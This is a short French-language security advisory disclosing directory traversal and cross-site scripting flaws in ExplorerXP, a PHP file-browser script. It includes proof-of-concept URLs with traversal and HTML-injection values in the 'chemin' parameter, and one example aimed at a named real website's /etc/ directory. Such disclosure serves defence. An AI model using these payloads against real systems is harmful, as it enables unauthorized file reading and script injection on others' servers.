ExplorerXP : ( all version )

Langage : PHP
Problème : Directory Traversal & Cross Site Scripting ( XSS )

Description :
ExploreXP consiste à visualiser l'arborescence des fichiers et répertoires à
partir d'un répertoire donné. En tout 2 fichiers

php (10KB) et un réperoire images. Un explorateur de fichiers très simple à
mettre en oeuvre. Il possède en plus un design

"Windows XP".
L'installation est très facile, il suffit de télécharger le fichier
compressé, de le décompressé et de déposer les 2 fichiers

php + le répertoire d'images dans un répertoire quelconque. Faire pointer
ensuite son navigateur sur /repertoire/dir.php et

le tour est joué.

Exploitation :
Directory Traversal : http://[target]/dir.php?chemin=../../../

Cross Site Scripting : http://[target]/dir.php?chemin=../<b>Silitix

Screenshoot disponobile sur l'avis de sécurité original.

Original Advisories : www.Silitix.com/explorerxp.php

Exemple :
http://www.ligue94.org/explor/dir.php?chemin=../../../../../../../../../etc/

Crédits
Auteur : Amine ABOUD aka Silitix
E-mail : admin@silitix.com
Website : http://www.Silitix.com